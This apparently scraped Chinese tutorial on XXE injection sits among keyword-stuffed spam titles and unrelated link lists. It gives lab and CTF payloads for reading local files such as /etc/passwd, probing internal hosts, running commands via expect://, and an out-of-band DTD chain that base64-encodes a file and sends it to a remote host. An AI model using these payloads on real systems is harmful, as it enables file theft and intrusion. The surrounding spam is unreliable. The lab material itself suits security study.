当前位置: 首页 > news >正文

营销网站解决方案关键词优化易下拉稳定

营销网站解决方案,关键词优化易下拉稳定,七牛云app,广州大型网站建设公司排名文章目录 1、概述1.1、XML概念1.2、XML与HTML的主要差异1.3、XML代码示例 2、靶场演示2.1、Pikachu靶场--XML数据传输测试玩法-1-读取文件玩法-2-内网探针或攻击内网应用#xff08;触发漏洞地址#xff09;玩法-3-RCE引入外部实体DTD无回显-读取文件开启phpstudy--apache日志… 文章目录 1、概述1.1、XML概念1.2、XML与HTML的主要差异1.3、XML代码示例 2、靶场演示2.1、Pikachu靶场--XML数据传输测试玩法-1-读取文件玩法-2-内网探针或攻击内网应用触发漏洞地址玩法-3-RCE引入外部实体DTD无回显-读取文件开启phpstudy--apache日志 3、XXE绕过4、XXE检测4.1、xxe-lab靶场4.2、CTF-Jarvis-OJ-Web-XXE4.3、Vulnhub/XXE Lab: 1 5、XXEinjection工具6、XXE安全防御 1、概述 1.1、XML概念 XML被设计为传输和存储数据XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素其焦点是数据的内容其把数据从HTML分离是独立于软件和硬件的信息传输工具。 XXE漏洞全称XMLExternal Entity Injection即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时没有禁止外部实体的加载导致可加载恶意外部文件造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害 XXE是XML的一个漏洞 XXE产生根本原因网站接受XML数据没有对xml进行过滤 1.2、XML与HTML的主要差异 XML被设计为传输和存储数据其焦点是数据的内容。 HTML被设计用来显示数据其焦点是数据的外观。 HTML旨在**显示信息而XML旨在传输信息**。 1.3、XML代码示例 !--文档类型定义-- !DOCTYPE note [ !--定义此文档时note类型的文档-- !ELEMENT note (to,from,heading,body) !--定义note元素有四个元素-- !ELEMENT to (#PCDATA) !--定义to元素为#PCDATA类型-- !ELEMENT from (#PCDATA) !--定义from元素为#PCDATA类型-- !ELEMENT head (#PCDATA) !--定义head元素为#PCDATA类型-- !ELEMENT body (#PCDATA) !--定义body元素为#PCDATA类型-- ]]]!--文档元素-- notetoDave/tofromTom/fromheadReminder/headbodyYou are a good man/body /note2、靶场演示 2.1、Pikachu靶场–XML数据传输测试 -回显玩法协议引入 玩法-1-读取文件 前提读取的文件必须存在 ?xml version 1.0? !DOCTYPE ANY [!ENTITY xxe SYSTEM file:///C:/tmp/1.txt ] xxxe;/x玩法-2-内网探针或攻击内网应用触发漏洞地址 ?xml version 1.0 encodingUTF-8? !DOCTYPE foo [ !ELEMENT foo ANY !ENTYTY rabbit SYSTEM http://192.168.8.3/1.php ] xrabbit;/x上面的ip地址假设就是内网的一台服务器的ip地址。还可以进行一个端口扫描看一下端口是否开放 如果访问的文件不存在会显示如下图的信息 玩法-3-RCE 该CASE是在安装expect扩展的PHP环境里执行系统命令 ?xml version 1.0? !DOCTYPE ANY [!ENTITY xxe SYSTEM expect://id ] xxxe;/xid是对于的执行的命令。实战情况比较难碰到 引入外部实体DTD ?xml version 1.0? !DOCTYPE test [!ENTITY % file SYSTEM http://127.0.0.1/evil2.dtd%file; ] xsend;/x把核心 代码写入evil2.dtd内容如下 !ENTITY send SYSTEM file:///C:/tmp/1.txt条件看对方的应用有没有禁用外部实体引用这也是防御XXE的一种措施 无回显-读取文件 先把靶场的回显代码注释掉 ?xml version 1.0? !DOCTYPE test [!ENTITY % file SYSTEM php://filter/readconvert.base64-encode/resourceC:/tmp/1.txt!ENTITY % dtd SYSTEM http://192.168.8.3:80/test.dtd%dtd;%send; ]#读取C:/tmp/1.txt里的内容复制给 file #然后去请求test.dtdtest.dtd !ENTITY % payload!ENTITY #x25; send SYSTEM http://192.168.8.3:80/?data%file;%payload;#去访问?data上面读到的数据开启phpstudy–apache日志 重启phpstudy就有了一个access.log 然后攻击无回显查看日志 解码网站https://www.bejson.com/enc/base64/ 3、XXE绕过 CTF XXE 4、XXE检测 4.1、xxe-lab靶场 xxe-lab靶场登录框xml数据传输测试–检查发现 靶场地址https://github.com/c0ny1/xxe-lab 请求头中如下Content-Type: application/xml;或者Content-Type: text/xml;Payload ?xml version1.0? !DOCTYPE Mikasa [ !ENTITY test SYSTEM file:///C:/tmp/1.txt ] userusernametest;/usernamepasswordMikasa/password/user4.2、CTF-Jarvis-OJ-Web-XXE XXE安全真题复现–修改数据请求格式 地址http://web.jarvisoj.com:9882/ 点击Go!BurpSuite拦截 数据包为json格式 修改Content-Type 提交Payload ?xml version1.0? !DOCTYPE ANY [ !ENTITY ss SYSTEM file:///etc/passwd ] xss;/x4.3、Vulnhub/XXE Lab: 1 靶场地址XXE Lab: 1 下载地址Download (Mirror) 5、XXEinjection工具 XXE安全漏洞自动化注射脚本 工具 XXEinjector本身提供了非常非常丰富的操作选项所以大家在利用XXEinjector进行渗透测试之前请自习了解这些配置选项以最大限度地发挥XXEinjector的功能。当然了由于XXEinjector是基于Ruby开发的所以Ruby运行环境就是必须的了。这里建议在kali环境下运行 工具地址 https://github.com/enjoiz/XXEinjectorhttps://github.com/enjoiz/XXEinjector/archive/master.zip 工具使用 https://www.cnblogs.com/bmjoker/p/9614990.html git clone https://github.com/enjoiz/XXEinjector.git6、XXE安全防御 php java python 过滤及禁用
http://www.hkea.cn/news/14383497/

相关文章:

  • 多种语言网站建设培训网页设计机构
  • 网站前期建设建设网站的网站江苏
  • 管理部门网站建设说明书直播间人气互动平台
  • 罗湖商城网站建设找哪家公司比较安全只做百度移动端网站可以吗
  • 锦绣江南网站建设长宁区网站建设开
  • 网站开发原始数据建设网站前景怎么样
  • qq炫舞做浴缸的网站网站制作导航超链接怎么做
  • 如何做网站推广的策略如何自己制作简单脚本
  • 电子商务网站建设第一章课后鲜花网站模板
  • 五指山住房建设局网站网站不兼容怎么办啊
  • 怎让做淘宝网站wordpress编辑媒体永久链接
  • 建立个人网站能赚钱吗中国外协加工网最新订单
  • 学校网站建设与维护成都个人兼职做网站
  • 沧州最火网站如何开发微信小程序开发
  • 做网站ps分辨率给多少钱南京宣传片制作公司
  • 门户网站和官网的区别网站色彩搭配案例
  • 网站设计的公司蒙特wap音乐网站源码
  • 购物网站建设需要什么资质外国人 做的中国字网站
  • 基于wordpress门户网站爱站网关键词挖掘工具站长工具
  • 呼市做网站国家商标注册官网查询系统
  • 南宁百度网站公司电话拥有响应式网站
  • 顺德做外贸网站怎样做彩票网站
  • 做软件下载网站违法吗怎么找网站模板
  • 做简历网站有什么龙岩推广公司
  • 湖北省建设人力资源网站首页wordpress更换链接自动跳转
  • 专业网站开发设计微信公众号模板
  • 中山网站制作设计广东网站设计哪家好
  • 兰州起点网站建设如何创建自己的博客
  • 适配网站建设模版个人开公司需要多少注册资金
  • 怎么刷网站点击量有什么设计logo网站